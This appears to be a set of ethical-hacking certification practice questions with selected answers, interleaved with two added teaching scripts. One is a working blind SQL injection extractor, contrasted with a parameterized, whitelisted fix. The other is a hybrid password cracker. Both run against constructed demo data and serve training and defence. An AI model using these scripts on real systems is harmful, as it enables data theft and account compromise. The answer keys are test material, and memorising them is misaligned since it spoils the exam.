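Option A of this question and the whitelist validation of Question #20 above, shown together as an added example that is not part of the original questions or answers. The vulnerable lookup concatenates the customer id into SQL and relies on a pattern blocklist; the attacker never sees data, only a true/false page, yet recovers a column one character at a time. The hardened lookup accepts only what the whitelist allows (type, size, range) and binds the value as a query parameter, so the same oracle yields nothing. The table contents, the blocklist and the column names are constructed for the demonstration; sqlite3 stands in for the site's SQL database.

```python
import re
import sqlite3
import string

# Constructed in-memory stand-in for the e-commerce customer table.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT);
    INSERT INTO customers VALUES (7, 'alice@example.com', '4242');
    INSERT INTO customers VALUES (8, 'bob@example.com', '1337');
""")

# Blocklist of "suspicious patterns" like the one the question describes.
# It stops the textbook payloads but not a boolean condition built with AND/substr.
BLOCKED = re.compile(r"(--|;|\bunion\b|\bdrop\b|\bor\b\s+1\s*=\s*1)", re.IGNORECASE)


def vulnerable_lookup(customer_id: str) -> bool:
    """True if the page would render 'customer found'. The id is concatenated into SQL."""
    if BLOCKED.search(customer_id):
        return False
    row = db.execute(f"SELECT id FROM customers WHERE id = {customer_id}").fetchone()
    return row is not None


def blind_extract(oracle, column: str, row_id: int, max_len: int = 8) -> str:
    """Boolean-based blind extraction: one true/false answer per guessed character."""
    alphabet = string.digits + string.ascii_letters + "@."
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (f"{row_id} AND substr((SELECT {column} FROM customers "
                       f"WHERE id={row_id}),{pos},1)='{ch}'")
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the value
    return recovered


# Whitelist: a customer id is a positive decimal integer of at most ten digits.
ID_PATTERN = re.compile(r"^[1-9][0-9]{0,9}$")


def hardened_lookup(customer_id: str) -> bool:
    """Whitelist validation (type, size, range) plus a parameterized query."""
    if not ID_PATTERN.match(customer_id):
        raise ValueError("customer id must be a positive integer")
    value = int(customer_id)
    if not 1 <= value <= 2**31 - 1:
        raise ValueError("customer id out of range")
    row = db.execute("SELECT id FROM customers WHERE id = ?", (value,)).fetchone()
    return row is not None


def hardened_oracle(payload: str) -> bool:
    """Same true/false interface as the vulnerable page, backed by the hardened lookup."""
    try:
        return hardened_lookup(payload)
    except ValueError:
        return False


if __name__ == "__main__":
    print(blind_extract(vulnerable_lookup, "card_last4", 7))       # the attacker's view
    print(blind_extract(vulnerable_lookup, "email", 8, max_len=20))
    print(repr(blind_extract(hardened_oracle, "card_last4", 7)))   # nothing recovered
```

The blocklist in `BLOCKED` rejects `7 OR 1=1` but passes every payload the extraction loop sends, which is why the question's "input validation against suspicious patterns" is no defence on its own; only the whitelist plus parameter binding removes the oracle.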
Question #: 230
Topic #: 1
Consider a scenario where a Certified Ethical Hacker is attempting to infiltrate a company’s network without being detected. The hacker intends to use a stealth scan on a BSD-derived TCP/IP stack, but he suspects that the network security devices may be able to detect SYN packets. Based on this information, which of the following methods should he use to bypass the detection mechanisms and why?
A. Maimon Scan, because it is very similar to NULL, FIN, and Xmas scans, but the probe used here is FIN/ACK
B. Xmas Scan, because it can pass through filters undetected, depending on the security mechanisms installed
C. TCP Connect/Full-Open Scan, because it completes a three-way handshake with the target machine
D. ACK Flag Probe Scan, because it exploits the vulnerabilities within the BSD-derived TCP/IP stack
Selected Answer: D
Question #: 228
Topic #: 1
In a large organization, a network security analyst discovered a series of packet captures that seem unusual. The network operates on a switched Ethernet environment. The security team suspects that an attacker might be using a sniffer tool. Which technique could the attacker be using to successfully carry out this attack, considering the switched nature of the network?
A. The attacker might be compromising physical security to plug into the network directly.
B. The attacker might be implementing MAC flooding to overwhelm the switch’s memory.
C. The attacker is probably using a Trojan horse with in-built sniffing capability.
D. The attacker might be using passive sniffing, as it provides significant stealth advantages.
Selected Answer: B
Question #: 224
Topic #: 1
An ethical hacker is preparing to scan a network to identify live systems. To increase the efficiency and accuracy of his scans, he is considering several different host discovery techniques. He expects several unused IP addresses at any given time, specifically within the private address range of the LAN, but he also anticipates the presence of restrictive firewalls that may conceal active devices. Which scanning method would be most effective in this situation?
A. ICMP ECHO Ping Sweep
B. ICMP Timestamp Ping
C. TCP SYN Ping
D. ARP Ping Scan
Selected Answer: D
Question #: 222
Topic #: 1
Being a Certified Ethical Hacker (CEH), a company has brought you on board to evaluate the safety measures in place for their network system. The company uses a network time protocol server in the demilitarized zone. During your enumeration, you decide to run an ntptrace command. Given the syntax: ntptrace [-n] [-m maxhosts] [servername/IP_address], which command usage would best serve your objective to find where the NTP server obtains the time from and to trace the list of NTP servers connected to the network?
A. ntptrace -n -m 5 192.168.1.1
B. ntptrace -m 5 192.168.1.1
C. ntptrace -n localhost
D. ntptrace 192.168.1.1
Selected Answer: D
Question #: 208
Topic #: 1
As a certified ethical hacker, you are performing a system hacking process for a company that is suspicious about its security system. You found that the company’s passwords are all known words, but not in the dictionary. You know that one employee always changes the password by just adding some numbers to the old password. Which attack is most likely to succeed in this scenario?
A. Brute-Force Attack
B. Password Spraying Attack
C. Hybrid Attack
D. Rule-based Attack
Selected Answer: C
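A hybrid attack in working form, added here as an example and not part of the original question or answer: every base word is tried as-is and then with every 1- to 3-digit suffix appended, which is exactly the "old password plus some numbers" habit described. The word list, the hashing (unsalted SHA-256) and the target password are constructed for the demonstration; a real engagement would feed the candidates to the hash format actually dumped.

```python
import hashlib
import itertools
from typing import Iterable, Iterator, Optional, Tuple


def hybrid_candidates(words: Iterable[str], max_digits: int = 3) -> Iterator[str]:
    """Yield each base word, then the word with every 1..max_digits-digit suffix.

    Plain dictionary tries come first, so the cheapest guesses are spent before
    the appended-number variants (10 + 100 + 1000 extra candidates per word at 3 digits).
    """
    for word in words:
        yield word
        for n in range(1, max_digits + 1):
            for digits in itertools.product("0123456789", repeat=n):
                yield word + "".join(digits)


def crack(target_hash: str, words: Iterable[str],
          max_digits: int = 3) -> Tuple[Optional[str], int]:
    """Return (recovered password, candidates tried), or (None, tried) on failure."""
    tried = 0
    for candidate in hybrid_candidates(words, max_digits):
        tried += 1
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return candidate, tried
    return None, tried


# Constructed "dumped" hash: the employee appended 24 to the old password Wintersun.
# The base words are not dictionary words, which is why a plain dictionary attack fails.
COMPANY_WORDS = ["SafePath", "Wintersun"]
SAMPLE_HASH = hashlib.sha256(b"Wintersun24").hexdigest()

if __name__ == "__main__":
    password, tried = crack(SAMPLE_HASH, COMPANY_WORDS)
    print(password, tried)   # Wintersun24 after 1147 candidates
```

A brute-force attack over the same 11-character alphanumeric space would need on the order of 62^11 guesses; the hybrid list finds the password in just over a thousand because it starts from the known base words.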
Question #: 204
Topic #: 1
While working as an intern for a small business, you have been tasked with managing the company’s web server. The server is being bombarded with requests, and the company’s website is intermittently going offline. You suspect that this could be a Distributed Denial of Service (DDoS) attack. As an ethical hacker, which of the following steps would be your first course of action to mitigate the issue?
A. Contact your Internet Service Provider (ISP) for assistance
B. Install a newer version of the server software
C. Implement IP address whitelisting
D. Increase the server’s bandwidth
Selected Answer: A
Question #: 166
Topic #: 1
As a cybersecurity analyst for a large corporation, you are auditing the company’s mobile device management (MDM) policy. One of your areas of concern is data leakage from company-provided smartphones. You are worried about employees unintentionally installing malicious apps that could access sensitive corporate data on their devices. Which of the following would be an effective measure to prevent such data leakage?
A. Require biometric authentication for unlocking devices.
B. Regularly change Wi-Fi passwords used by the devices.
C. Mandate the use of VPNs when accessing corporate data.
D. Enforce a policy that only allows app installations from approved corporate app stores.
Selected Answer: D
Question #: 123
Topic #: 1
Which file is a rich target to discover the structure of a website during web-server footprinting?
A. domain.txt
B. Robots.txt
C. Document root
D. index.html
Selected Answer: B
Question #: 85
Topic #: 1
Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries.
Which of the following tiers of the container technology architecture is Abel currently working in?
A. Tier-1: Developer machines
B. Tier-2: Testing and accreditation systems
C. Tier-3: Registries
D. Tier-4: Orchestrators
Selected Answer: B